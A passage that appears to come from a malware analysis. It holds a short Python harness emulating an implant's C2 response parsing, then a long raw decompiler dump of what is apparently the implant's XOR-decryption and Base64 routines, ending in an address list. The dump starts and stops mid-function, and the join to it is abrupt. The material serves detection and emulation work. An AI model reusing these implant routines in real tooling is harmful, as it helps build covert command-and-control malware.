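SAMPLE_OK = b"<!doctype html><body>{<html>}eyJjbWQiOiAicGluZyJ9{</html>}</body>"
SAMPLE_NO_END = b"<body>{<html>}truncated response"
SAMPLE_LATIN1 = b"{<html>}caf\xe9{</html>}"

if __name__ == "__main__":
    print(handle_response(SAMPLE_OK, "utf-8"))
    print(handle_response(SAMPLE_LATIN1, "iso-8859-1"))
    try:
        handle_response(SAMPLE_NO_END, "utf-8")
    except C2ResponseError as err:
        print("rejected with error", err.code)
```

The fail-closed check matters for detection work: a decoy page that carries only one of the two markers makes the implant record error 13 and drop the response, so a sinkhole or emulator that wants the sample to proceed has to serve both markers in order.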
                                  											_push(_t1378);
                                  											_t1379 = _t1384;
                                  											_push(0xffffffff);
                                  											_push(0xc16f0d);
                                  											_push( *[fs:0x0]);
                                  											_t1386 = _t1384 - 0x30;
                                  											_t702 =  *0xc2e00c; // 0x5cb9e59c
                                  											_t703 = _t702 ^ _t1379;
                                  											_v48 = _t703;
                                  											_push(_t1062);
                                  											_push(_t1349);
                                  											_push(_t1330);
                                  											_push(_t703);
                                  											 *[fs:0x0] =  &_v44;
                                  											_t1351 = _v24;
                                  											_v88 = _t1351;
                                  											_v92 = _t1351;
                                  											_v36 = 0;
                                  											_t1332 = _v4;
                                  											_t1251 = 0xf0f0f0f1 * _t1332 >> 0x20;
                                  											_t1064 = _t1251 >> 8;
                                  											_v84 = _t1064;
                                  											__eflags = _t1332 != _t1064 * 0x110;
                                  											if(_t1332 != _t1064 * 0x110) {
                                  												_t1064 = _t1064 + 1;
                                  												__eflags = _t1064;
                                  												_v60 = _t1064;
                                  											}
                                  											_t1088 = _t1351;
                                  											_push(0);
                                  											E00BE6060(_t1064, _t1088, _t1251, _t1332 - (_t1064 << 4));
                                  											_t1334 = _a4;
                                  											_t711 = 0;
                                  											_v52 = 0;
                                  											__eflags = _t1064;
                                  											if(_t1064 <= 0) {
                                  												_t1065 = _a24;
                                  											} else {
                                  												_t1295 = _t1064 - 1;
                                  												_v44 = 0;
                                  												_t1065 = _a24;
                                  												_t1138 = 0;
                                  												__eflags = 0;
                                  												_v68 = _t1295;
                                  												_v56 = 0;
                                  												do {
                                  													_t1364 = _t1138;
                                  													__eflags = _t711 - _t1295;
                                  													if(_t711 != _t1295) {
                                  														_t1296 = 0x100;
                                  													} else {
                                  														_t1296 = _a20 - (0xf0f0f0f1 * _a20 >> 0x20 >> 8) * 0x110 - 0x10;
                                  													}
                                  													_v48 = _t1296;
                                  													_t1139 = 0;
                                  													__eflags = 0;
                                  													do {
                                  														__eflags = _t1065 - 0x10;
                                  														_t809 =  >=  ? _t1334 :  &_a4;
                                  														_t453 = _t1139 + 0xc2eb34; // 0x987249c
                                  														__eflags = _t1065 - 0x10;
                                  														 *(_t1379 + _t1139 - 0x20) =  *(( >=  ? _t1334 :  &_a4) + _t1364) & 0x000000ff ^  *_t453;
                                  														_t813 =  >=  ? _t1334 :  &_a4;
                                  														_t459 = _t1139 + 0xc2eb35; // 0x81098724
                                  														__eflags = _t1065 - 0x10;
                                  														 *(_t1379 + _t1139 - 0x1f) =  *(( >=  ? _t1334 :  &_a4) + _t1364 + 1) & 0x000000ff ^  *_t459;
                                  														_t817 =  >=  ? _t1334 :  &_a4;
                                  														_t465 = _t1139 + 0xc2eb36; // 0x49810987
                                  														__eflags = _t1065 - 0x10;
                                  														 *(_t1379 + _t1139 - 0x1e) =  *(( >=  ? _t1334 :  &_a4) + _t1364 + 2) & 0x000000ff ^  *_t465;
                                  														_t821 =  >=  ? _t1334 :  &_a4;
                                  														_t822 =  *(( >=  ? _t1334 :  &_a4) + _t1364 + 3) & 0x000000ff;
                                  														_t1364 = _t1364 + 4;
                                  														_t471 = _t1139 + 0xc2eb37; // 0x7d498109
                                  														 *(_t1379 + _t1139 - 0x1d) = _t822 ^  *_t471;
                                  														_t1139 = _t1139 + 4;
                                  														__eflags = _t1139 - 0x10;
                                  													} while (_t1139 < 0x10);
                                  													_t824 = 0;
                                  													__eflags = _t1296;
                                  													if(_t1296 > 0) {
                                  														do {
                                  															__eflags = _t1065 - 0x10;
                                  															_t1142 =  >=  ? _t1334 :  &_a4;
                                  															_t1078 = ( >=  ? _t1334 :  &_a4) + _t1364;
                                  															_t1143 = _v64;
                                  															_t1347 = _t1143;
                                  															__eflags =  *((intOrPtr*)(_t1143 + 0x14)) - 0x10;
                                  															if( *((intOrPtr*)(_t1143 + 0x14)) >= 0x10) {
                                  																_t1347 =  *_t1143;
                                  															}
                                  															_t1364 = _t1364 + 1;
                                  															_t1146 =  *0xc2eb30; // 0xc2e9d0
                                  															 *(_v44 + _t1347 + _t824) =  *(_t1379 + (_t824 & 0x0000000f) - 0x20) ^  *(_t1146 + _t824) ^  *_t1078;
                                  															_t824 = _t824 + 1;
                                  															_t1065 = _a24;
                                  															_t1334 = _a4;
                                  															__eflags = _t824 - _v48;
                                  														} while (_t824 < _v48);
                                  													}
                                  													_t711 = _v52 + 1;
                                  													_v44 = _v44 + 0x100;
                                  													_t1138 = _v56 + 0x110;
                                  													_t1295 = _v68;
                                  													_v52 = _t711;
                                  													_v56 = _t1138;
                                  													__eflags = _t711 - _v60;
                                  												} while (_t711 < _v60);
                                  												_t1351 = _v64;
                                  											}
                                  											__eflags = _t1065 - 0x10;
                                  											if(_t1065 < 0x10) {
                                  												L241:
                                  												 *[fs:0x0] = _v20;
                                  												__eflags = _v24 ^ _t1379;
                                  												return E00BF44D0(_v24 ^ _t1379);
                                  											} else {
                                  												_t1067 = _t1065 + 1;
                                  												_t714 = _t1334;
                                  												__eflags = _t1067 - 0x1000;
                                  												if(_t1067 < 0x1000) {
                                  													L240:
                                  													_push(_t1067);
                                  													E00BF4B47(_t1334);
                                  													goto L241;
                                  												} else {
                                  													_t1334 =  *((intOrPtr*)(_t1334 - 4));
                                  													_t1067 = _t1067 + 0x23;
                                  													__eflags = _t714 - _t1334 + 0xfffffffc - 0x1f;
                                  													if(__eflags > 0) {
                                  														E00C01351(_t1067, _t1088, _t1251, _t1334, __eflags);
                                  														asm("int3");
                                  														_push(_t1379);
                                  														_t1380 = _t1386;
                                  														_t1388 = _t1386 - 0x20;
                                  														_push(_t1067);
                                  														_push(_t1351);
                                  														_t1353 = _t1088;
                                  														_v140 = 3;
                                  														_push(_t1334);
                                  														_t1336 = _t1251;
                                  														_t1068 = 0;
                                  														_v144 = _t1336;
                                  														_v132 = 0;
                                  														E00BE5E20(0xaaaaaaab * ( *(_t1353 + 0x10) - ( *(_t1353 + 0x10) + 2) % _v140 + 2), 0, _t1336, 0xaaaaaaab * ( *(_t1353 + 0x10) - ( *(_t1353 + 0x10) + 2) % _v140 + 2) >> 0x20 >> 1 << 2, 0);
                                  														__eflags =  *((intOrPtr*)(_t1353 + 0x14)) - 0x10;
                                  														_t724 =  *(_t1353 + 0x10);
                                  														if( *((intOrPtr*)(_t1353 + 0x14)) >= 0x10) {
                                  															_t1353 =  *_t1353;
                                  														}
                                  														__eflags = _t724;
                                  														if(_t724 == 0) {
                                  															L275:
                                  															__eflags = _t1068 -  *((intOrPtr*)(_t1336 + 0x10));
                                  															_t580 = _t1068 ==  *((intOrPtr*)(_t1336 + 0x10));
                                  															__eflags = _t580;
                                  															return _t724 & 0xffffff00 | _t580;
                                  														} else {
                                  															_t1097 = 0;
                                  															__eflags = 0;
                                  															do {
                                  																_v44 = _t724 - 1;
                                  																_t727 = _t1353;
                                  																_t1353 = _t1353 + 1;
                                  																 *((char*)(_t1380 + _t1097 - 8)) =  *_t727;
                                  																_t1097 = _t1097 + 1;
                                  																_t1258 = _v19;
                                  																_v13 = _v18;
                                  																_v15 = _t1258;
                                  																__eflags = _t1097 - 3;
                                  																if(_t1097 == 3) {
                                  																	_t1070 = _v28;
                                  																	_v32 = _t1336;
                                  																	_t794 = _t1258 >> 4;
                                  																	_t1134 = ((_t1258 & 0x00000003) << 4) + _t794;
                                  																	_v24 = _t794;
                                  																	_t1294 = ((_t1258 & 0x0000000f) << 2) + (_v13 >> 6);
                                  																	_v23 = _t1134;
                                  																	_t798 = _v13 & 0x0000003f;
                                  																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
                                  																	_v14 = _t798;
                                  																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
                                  																		_v32 =  *_t1336;
                                  																		_t1070 = _v28;
                                  																	}
                                  																	 *((char*)(_v32 + _t1070)) =  *((intOrPtr*)((_t798 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
                                  																	_t1336 = _v40;
                                  																	_v32 = _t1336;
                                  																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
                                  																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
                                  																		_v32 =  *_t1336;
                                  																	}
                                  																	 *((char*)(_t1070 + _v32 + 1)) =  *((intOrPtr*)((_t1134 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
                                  																	_t1136 = _t1336;
                                  																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
                                  																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
                                  																		_t1136 =  *_t1336;
                                  																	}
                                  																	 *((char*)(_t1070 + _t1136 + 2)) =  *((intOrPtr*)((_t1294 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
                                  																	_t1137 = _t1336;
                                  																	__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
                                  																	if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
                                  																		_t1137 =  *_t1336;
                                  																	}
                                  																	_t1258 = _v15;
                                  																	 *((char*)(_t1070 + _t1137 + 3)) =  *((intOrPtr*)((_v14 & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
                                  																	_t1068 = _t1070 + 4;
                                  																	_v28 = _t1068;
                                  																	_t1097 = 0;
                                  																	__eflags = 0;
                                  																}
                                  																_t724 = _v44;
                                  																__eflags = _t724;
                                  															} while (_t724 != 0);
                                  															__eflags = _t1097;
                                  															if(_t1097 == 0) {
                                  																goto L275;
                                  															} else {
                                  																_t730 = _t1097;
                                  																__eflags = _t1097 - 3;
                                  																if(_t1097 >= 3) {
                                  																	goto L265;
                                  																} else {
                                  																	__eflags = _t730 - 3;
                                  																	while(__eflags < 0) {
                                  																		 *((char*)(_t1380 + _t730 - 8)) = 0;
                                  																		_t730 = _t730 + 1;
                                  																		__eflags = _t730 - 3;
                                  																		if(__eflags < 0) {
                                  																			continue;
                                  																		} else {
                                  																			_t1258 = _v20;
                                  																			L265:
                                  																			_t563 = _t1097 + 1; // 0x2
                                  																			_t1355 = _t563;
                                  																			_t1259 = _t1258 & 0x00000003;
                                  																			_v24 = _t1258 >> 2;
                                  																			_t735 = _t1259 >> 4;
                                  																			_t1263 = ((_t1259 & 0x0000000f) << 4) + _t735 << 2;
                                  																			_v23 = _t1263;
                                  																			_t724 = _t735 >> 0x00000006 & 0x0000003f;
                                  																			_v21 = _t724;
                                  																			_v22 = _t1263 + _t724;
                                  																			__eflags = _t1355;
                                  																			if(_t1355 > 0) {
                                  																				_t739 =  &_v24 - _t1068;
                                  																				__eflags = _t739;
                                  																				_v44 = _t739;
                                  																				do {
                                  																					__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
                                  																					_t1267 = _t1336;
                                  																					if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
                                  																						_t1267 =  *_t1336;
                                  																					}
                                  																					 *((char*)(_t1267 + _t1068)) =  *((intOrPtr*)(( *(_t739 + _t1068) & 0x000000ff) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"));
                                  																					_t1068 = _t1068 + 1;
                                  																					_t739 = _v44;
                                  																					_t1355 = _t1355 - 1;
                                  																					__eflags = _t1355;
                                  																				} while (_t1355 != 0);
                                  																			}
                                  																			__eflags = _t1097 - 3;
                                  																			if(_t1097 < 3) {
                                  																				_t1266 = _v36 - _t1097;
                                  																				__eflags = _t1266;
                                  																				do {
                                  																					__eflags =  *((intOrPtr*)(_t1336 + 0x14)) - 0x10;
                                  																					_t724 = _t1336;
                                  																					if( *((intOrPtr*)(_t1336 + 0x14)) >= 0x10) {
                                  																						_t724 =  *_t1336;
                                  																					}
                                  																					 *((char*)(_t724 + _t1068)) = 0x3d;
                                  																					_t1068 = _t1068 + 1;
                                  																					_t1266 = _t1266 - 1;
                                  																					__eflags = _t1266;
                                  																				} while (_t1266 != 0);
                                  																			}
                                  																			goto L275;
                                  																		}
                                  																		goto L338;
                                  																	}
                                  																	E00BF47EC();
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	asm("int3");
                                  																	_push(_t1380);
                                  																	_t1381 = _t1388;
                                  																	_t1389 = _t1388 - 0x18;
                                  																	_push(_t1068);
                                  																	_t743 = _t1097;
                                  																	_t1071 = _t1258;
                                  																	_push(_t1353);
                                  																	_push(_t1336);
                                  																	_t1339 = 0;
                                  																	_v188 = _t1071;
                                  																	_t1268 =  *((intOrPtr*)(_t743 + 0x14));
                                  																	_t1356 = _t743;
                                  																	_v180 = 0;
                                  																	_v184 =  *((intOrPtr*)(_t743 + 0x10));
                                  																	__eflags = _t1268 - 0x10;
                                  																	if(_t1268 >= 0x10) {
                                  																		_t1356 =  *_t743;
                                  																	}
                                  																	_t1099 = 0;
                                  																	__eflags = _t1268 - 0x10;
                                  																	if(_t1268 >= 0x10) {
                                  																		_t743 =  *_t743;
                                  																	}
                                  																	_t1269 = _v36;
                                  																	_t744 = _t743 + _v36;
                                  																	__eflags =  *((char*)(_t744 - 1)) - 0x3d;
                                  																	while( *((char*)(_t744 - 1)) == 0x3d) {
                                  																		_t744 = _t744 - 1;
                                  																		_t1099 = _t1099 + 1;
                                  																		__eflags =  *((char*)(_t744 - 1)) - 0x3d;
                                  																	}
                                  																	asm("cdq");
                                  																	_t1100 = _t1071;
                                  																	E00BE5E20((_t1269 + _t1269 * 2 + _t1269 + _t1269 * 2 + (_t1269 & 0x00000007) >> 3) - _t1099, _t1071, _t1100, (_t1269 + _t1269 * 2 + _t1269 + _t1269 * 2 + (_t1269 & 0x00000007) >> 3) - _t1099, 0);
                                  																	_t751 = _v36;
                                  																	__eflags = _t751;
                                  																	if(_t751 == 0) {
                                  																		__eflags = 0 -  *((intOrPtr*)(_t1071 + 0x10));
                                  																		_t654 = 0 ==  *((intOrPtr*)(_t1071 + 0x10));
                                  																		__eflags = _t654;
                                  																		return _t751 & 0xffffff00 | _t654;
                                  																	} else {
                                  																		while(1) {
                                  																			_v36 = _t751 - 1;
                                  																			_t754 =  *_t1356;
                                  																			__eflags = _t754 - 0x3d;
                                  																			if(_t754 == 0x3d) {
                                  																				break;
                                  																			}
                                  																			 *(_t1381 + _t1339 - 0xc) = _t754;
                                  																			_t1356 = _t1356 + 1;
                                  																			_t1339 = _t1339 + 1;
                                  																			__eflags = _t1339 - 4;
                                  																			if(_t1339 == 4) {
                                  																				_t1283 = 0;
                                  																				__eflags = 0;
                                  																				_t596 = _t1339 + 0x3b; // 0x3c
                                  																				_t1076 = _t596;
                                  																				do {
                                  																					_t1121 =  *((intOrPtr*)(_t1381 + _t1283 - 0xc));
                                  																					_t781 = _t1121 - 0x41;
                                  																					__eflags = _t781 - 0x19;
                                  																					if(_t781 > 0x19) {
                                  																						__eflags = _t1121 - 0x61 - 0x19;
                                  																						if(_t1121 - 0x61 > 0x19) {
                                  																							__eflags = _t1121 - 0x30 - 9;
                                  																							if(_t1121 - 0x30 > 9) {
                                  																								__eflags = _t1121 - 0x2b;
                                  																								if(_t1121 != 0x2b) {
                                  																									__eflags = _t1121 - 0x2f;
                                  																									_t781 =  ==  ? _t1076 : 0xff;
                                  																								} else {
                                  																									_t781 = 0x3e;
                                  																								}
                                  																							} else {
                                  																								_t781 = _t1121 + 4;
                                  																							}
                                  																						} else {
                                  																							_t781 = _t1121 - 0x47;
                                  																						}
                                  																					}
                                  																					 *((char*)(_t1381 + _t1283 - 0xc)) = _t781;
                                  																					_t1283 = _t1283 + 1;
                                  																					__eflags = _t1283 - 4;
                                  																				} while (_t1283 < 4);
                                  																				_t782 = _v28;
                                  																				_t1071 = _v40;
                                  																				_t1124 = _t782 << 2;
                                  																				_t1346 = _t1071;
                                  																				_t1287 = (_t782 >> 0x00000004 & 0x00000003) + _t1124;
                                  																				_t1130 = ((_t1124 >> 0x00000002 & 0x0000000f) << 6) + _v25 + (_t782 << 4);
                                  																				__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
                                  																				_v24 = _t1287;
                                  																				_v23 = _t1130;
                                  																				_v17 = _t1130;
                                  																				if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
                                  																					_t1346 =  *_t1071;
                                  																				}
                                  																				_t785 = _v32;
                                  																				 *((char*)(_t1346 + _t785)) = _t1287;
                                  																				_t1288 = _t1071;
                                  																				__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
                                  																				if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
                                  																					_t1288 =  *_t1071;
                                  																				}
                                  																				 *((char*)(_t785 + _t1288 + 1)) = _t1130;
                                  																				_t1100 = _t1071;
                                  																				__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
                                  																				if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
                                  																					_t1100 =  *_t1071;
                                  																				}
                                  																				 *((char*)(_t785 + _t1100 + 2)) = _v17;
                                  																				_v32 = _t785 + 3;
                                  																				_t1339 = 0;
                                  																				__eflags = 0;
                                  																			}
                                  																			_t751 = _v36;
                                  																			__eflags = _t751;
                                  																			if(_t751 != 0) {
                                  																				continue;
                                  																			}
                                  																			break;
                                  																		}
                                  																		__eflags = _t1339;
                                  																		if(_t1339 == 0) {
                                  																			_t1272 = _v32;
                                  																			goto L329;
                                  																		} else {
                                  																			_t756 = _t1339;
                                  																			__eflags = _t1339 - 4;
                                  																			if(_t1339 >= 4) {
                                  																				L311:
                                  																				_t1273 = 0;
                                  																				__eflags = 0;
                                  																				_t627 = _t1273 + 0x3f; // 0x3f
                                  																				_t1074 = _t627;
                                  																				do {
                                  																					_t1101 =  *((intOrPtr*)(_t1381 + _t1273 - 0xc));
                                  																					_t630 = _t1101 - 0x41; // -65
                                  																					_t757 = _t630;
                                  																					__eflags = _t757 - 0x19;
                                  																					if(_t757 > 0x19) {
                                  																						_t631 = _t1101 - 0x61; // -97
                                  																						__eflags = _t631 - 0x19;
                                  																						if(_t631 > 0x19) {
                                  																							__eflags = _t1101 - 0x30 - 9;
                                  																							if(_t1101 - 0x30 > 9) {
                                  																								__eflags = _t1101 - 0x2b;
                                  																								if(_t1101 != 0x2b) {
                                  																									__eflags = _t1101 - 0x2f;
                                  																									_t757 =  ==  ? _t1074 : 0xff;
                                  																								} else {
                                  																									_t757 = 0x3e;
                                  																								}
                                  																							} else {
                                  																								_t757 = _t1101 + 4;
                                  																							}
                                  																						} else {
                                  																							_t632 = _t1101 - 0x47; // -71
                                  																							_t757 = _t632;
                                  																						}
                                  																					}
                                  																					 *((char*)(_t1381 + _t1273 - 0xc)) = _t757;
                                  																					_t1273 = _t1273 + 1;
                                  																					__eflags = _t1273 - 4;
                                  																				} while (_t1273 < 4);
                                  																				_t758 = _v28;
                                  																				_t1342 = _t1339 - 1;
                                  																				_t1071 = _v40;
                                  																				_v24 = (_t758 >> 0x00000004 & 0x00000003) + (_t758 << 2);
                                  																				_t1278 = _v26;
                                  																				_t754 = _t758 << 4;
                                  																				_v22 = (_t1278 << 6) + _v25;
                                  																				_t1272 = _v32;
                                  																				_v23 = (_t1278 >> 0x00000002 & 0x0000000f) + _t754;
                                  																				__eflags = _t1342;
                                  																				if(_t1342 <= 0) {
                                  																					L329:
                                  																					__eflags = _t1272 -  *((intOrPtr*)(_t1071 + 0x10));
                                  																					_t658 = _t1272 ==  *((intOrPtr*)(_t1071 + 0x10));
                                  																					__eflags = _t658;
                                  																					return _t754 & 0xffffff00 | _t658;
                                  																				} else {
                                  																					_t1360 =  &_v24 - _t1272;
                                  																					__eflags = _t1360;
                                  																					do {
                                  																						__eflags =  *((intOrPtr*)(_t1071 + 0x14)) - 0x10;
                                  																						_t1108 = _t1071;
                                  																						if( *((intOrPtr*)(_t1071 + 0x14)) >= 0x10) {
                                  																							_t1108 =  *_t1071;
                                  																						}
                                  																						_t760 =  *((intOrPtr*)(_t1360 + _t1272));
                                  																						 *(_t1108 + _t1272) = _t760;
                                  																						_t1272 = _t1272 + 1;
                                  																						_t1342 = _t1342 - 1;
                                  																						__eflags = _t1342;
                                  																					} while (_t1342 != 0);
                                  																					__eflags = _t1272 -  *((intOrPtr*)(_t1071 + 0x10));
                                  																					_t651 = _t1272 ==  *((intOrPtr*)(_t1071 + 0x10));
                                  																					__eflags = _t651;
                                  																					return _t760 & 0xffffff00 | _t651;
                                  																				}
                                  																			} else {
                                  																				__eflags = _t756 - 4;
                                  																				while(__eflags < 0) {
                                  																					 *((char*)(_t1381 + _t756 - 0xc)) = 0;
                                  																					_t756 = _t756 + 1;
                                  																					__eflags = _t756 - 4;
                                  																					if(__eflags < 0) {
                                  																						continue;
                                  																					} else {
                                  																						goto L311;
                                  																					}
                                  																					goto L338;
                                  																				}
                                  																				E00BF47EC();
                                  																				asm("int3");
                                  																				asm("int3");
                                  																				_push(_t1381);
                                  																				_t1382 = _t1389;
                                  																				_push(0xffffffff);
                                  																				_push(0xc16f58);
                                  																				_push( *[fs:0x0]);
                                  																				_t767 =  *0xc2e00c; // 0x5cb9e59c
                                  																				_t768 = _t767 ^ _t1382;
                                  																				__eflags = _t768;
                                  																				_v220 = _t768;
                                  																				_push(_t1356);
                                  																				_push(_t1339);
                                  																				_push(_t768);
                                  																				 *[fs:0x0] =  &_v216;
                                  																				_t1362 = _t1100;
                                  																				_v356 = _t1362;
                                  																				_v356 = _t1362;
                                  																				_v208 = 0;
                                  																				_v352 =  &_v348;
                                  																				E00BE6D40( &_v352, _v196, 3);
                                  																				_v208 = 1;
                                  																				_t1281 = _v352;
                                  																				_t1110 = _v352;
                                  																				 *(_t1362 + 0x10) = 0;
                                  																				 *((intOrPtr*)(_t1362 + 0x14)) = 0xf;
                                  																				 *_t1362 = 0;
                                  																				_t672 = _t1110 + 1; // 0x1
                                  																				_t1344 = _t672;
                                  																				do {
                                  																					_t772 =  *_t1110;
                                  																					_t1110 = _t1110 + 1;
                                  																					__eflags = _t772;
                                  																				} while (_t772 != 0);
                                  																				_push(_t1110 - _t1344);
                                  																				E00BE7D20(_t1071, _t1362, _t1344, _t1281);
                                  																				_t774 = _v168;
                                  																				_t1113 =  &_v164;
                                  																				__eflags = _t774 - _t1113;
                                  																				if(_t774 != _t1113) {
                                  																					E00C01D58(_t774);
                                  																				}
                                  																				_v24 = 0xffffffff;
                                  																				_t776 = _v12 + 0xfffffff0;
                                  																				asm("lock xadd [eax+0xc], ecx");
                                  																				__eflags = (_t1113 | 0xffffffff) - 1;
                                  																				if((_t1113 | 0xffffffff) - 1 <= 0) {
                                  																					 *((intOrPtr*)( *((intOrPtr*)( *_t776)) + 4))(_t776);
                                  																				}
                                  																				 *[fs:0x0] = _v32;
                                  																				__eflags = _v36 ^ _t1382;
                                  																				return E00BF44D0(_v36 ^ _t1382);
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													} else {
                                  														goto L240;
                                  													}
                                  												}
                                  											}
                                  										} else {
                                  											goto L217;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					__ecx[0x3e] = 3;
                                  					L219:
                                  					 *[fs:0x0] = _v16;
                                  					return E00BF44D0(_v20 ^ _t1378);
                                  				}
                                  				L338:
                                  			}
                                  0x00bd5f98
                                  0x00bd5f98
                                  0x00bd5fa0
                                  0x00bd5fa0
                                  0x00bd5fa3
                                  0x00bd5fa6
                                  0x00bd5fa6
                                  0x00bd5fab
                                  0x00bd5fab
                                  0x00bd5faf
                                  0x00bd5fb7
                                  0x00bd5fb7
                                  0x00bd5fbd
                                  0x00bd5fc2
                                  0x00bd5f3b
                                  0x00bd5f41
                                  0x00bd5f44
                                  0x00000000
                                  0x00000000
                                  0x00bd5f44
                                  0x00bd5fc5
                                  0x00bd5fcb
                                  0x00bd5fcd
                                  0x00bd5fd8
                                  0x00bd5fde
                                  0x00bd5fe0
                                  0x00bd5fe3
                                  0x00bd5fe8
                                  0x00bd5feb
                                  0x00bd5feb
                                  0x00bd6003
                                  0x00bd6009
                                  0x00bd600e
                                  0x00bd6015
                                  0x00bd6020
                                  0x00bd6020
                                  0x00bd6026
                                  0x00bd6037
                                  0x00bd603d
                                  0x00bd603f
                                  0x00bd6190
                                  0x00bd6045
                                  0x00bd6045
                                  0x00bd604b
                                  0x00bd604d
                                  0x00bd604f
                                  0x00bd6055
                                  0x00bd6057
                                  0x00bd6059
                                  0x00bd605f
                                  0x00bd6069
                                  0x00bd606d
                                  0x00bd6076
                                  0x00bd607a
                                  0x00bd607d
                                  0x00bd6085
                                  0x00bd608e
                                  0x00bd6092
                                  0x00bd6097
                                  0x00bd6099
                                  0x00bd6099
                                  0x00bd6057
                                  0x00bd60b0
                                  0x00bd60ba
                                  0x00bd60bf
                                  0x00bd60c2
                                  0x00bd60cc
                                  0x00bd60e5
                                  0x00bd60eb
                                  0x00bd60ed
                                  0x00bd60f3
                                  0x00bd60f9
                                  0x00bd6102
                                  0x00bd6104
                                  0x00bd610c
                                  0x00bd610c
                                  0x00bd610f
                                  0x00bd6124
                                  0x00bd612a
                                  0x00bd613c
                                  0x00bd6142
                                  0x00bd6147
                                  0x00bd614d
                                  0x00bd6150
                                  0x00bd6150
                                  0x00bd6166
                                  0x00bd616b
                                  0x00bd616e
                                  0x00bd616e
                                  0x00bd6174
                                  0x00bd6174
                                  0x00bd6180
                                  0x00bd6185
                                  0x00bd6185
                                  0x00bd6196
                                  0x00bd6196
                                  0x00bd61a3
                                  0x00bd61a9
                                  0x00bd61ab
                                  0x00bd61ad
                                  0x00bd61b3
                                  0x00bd61b5
                                  0x00bd61b7
                                  0x00bd61bd
                                  0x00bd61c7
                                  0x00bd61cb
                                  0x00bd61d4
                                  0x00bd61d8
                                  0x00bd61db
                                  0x00bd61e3
                                  0x00bd61ec
                                  0x00bd61f0
                                  0x00bd61f5
                                  0x00bd61f7
                                  0x00bd61f7
                                  0x00bd61b5
                                  0x00bd61fa
                                  0x00bd6200
                                  0x00bd6203
                                  0x00bd6205
                                  0x00bd620f
                                  0x00bd6213
                                  0x00bd6219
                                  0x00bd621b
                                  0x00bd621b
                                  0x00bd6225
                                  0x00bd622a
                                  0x00bd622d
                                  0x00bd622f
                                  0x00bd6231
                                  0x00bd6236
                                  0x00bd623c
                                  0x00bd623c
                                  0x00bd6261
                                  0x00bd6263
                                  0x00bd6265
                                  0x00bd62a1
                                  0x00bd62bc
                                  0x00bd62c6
                                  0x00bd62d1
                                  0x00bd62d6
                                  0x00bd62f0
                                  0x00bd62f6
                                  0x00bd62f8
                                  0x00bd62fa
                                  0x00bd62fc
                                  0x00bd6300
                                  0x00bd6300
                                  0x00bd6303
                                  0x00bd6306
                                  0x00bd6306
                                  0x00bd630b
                                  0x00bd630b
                                  0x00bd630f
                                  0x00bd6314
                                  0x00bd6314
                                  0x00bd631a
                                  0x00bd631f
                                  0x00bd6267
                                  0x00bd6272
                                  0x00bd6283
                                  0x00bd6297
                                  0x00bd6299
                                  0x00bd629b
                                  0x00000000
                                  0x00000000
                                  0x00bd629b
                                  0x00bd6322
                                  0x00bd632f
                                  0x00bd6336
                                  0x00bd633d
                                  0x00bd6344
                                  0x00bd6595
                                  0x00bd6595
                                  0x00000000
                                  0x00bd634a
                                  0x00bd634a
                                  0x00bd634f
                                  0x00bd6354
                                  0x00bd6357
                                  0x00bd635a
                                  0x00000000
                                  0x00000000
                                  0x00bd6360
                                  0x00bd6363
                                  0x00bd6366
                                  0x00bd6366
                                  0x00bd6369
                                  0x00000000
                                  0x00bd636b
                                  0x00bd636b
                                  0x00bd636f
                                  0x00bd637a
                                  0x00bd6380
                                  0x00bd638a
                                  0x00bd6391
                                  0x00bd6396
                                  0x00bd639c
                                  0x00bd63a2
                                  0x00bd63a8
                                  0x00bd63af
                                  0x00bd63b4
                                  0x00bd63bf
                                  0x00bd63c4
                                  0x00bd63ca
                                  0x00bd63cd
                                  0x00bd63d3
                                  0x00bd63d9
                                  0x00bd63db
                                  0x00bd63ea
                                  0x00bd63ec
                                  0x00bd63ee
                                  0x00bd63f5
                                  0x00bd63fb
                                  0x00bd6400
                                  0x00bd6410
                                  0x00bd6415
                                  0x00bd641b
                                  0x00bd641e
                                  0x00bd6424
                                  0x00bd642a
                                  0x00bd642c
                                  0x00bd6434
                                  0x00bd6434
                                  0x00bd643e
                                  0x00bd642e
                                  0x00bd6430
                                  0x00bd6432
                                  0x00000000
                                  0x00000000
                                  0x00bd6432
                                  0x00bd642c
                                  0x00bd63ec
                                  0x00bd6445
                                  0x00bd6449
                                  0x00bd644b
                                  0x00bd6517
                                  0x00bd6517
                                  0x00bd651b
                                  0x00bd6521
                                  0x00bd6524
                                  0x00bd655b
                                  0x00bd655b
                                  0x00bd6562
                                  0x00bd6568
                                  0x00bd659b
                                  0x00bd659c
                                  0x00000000
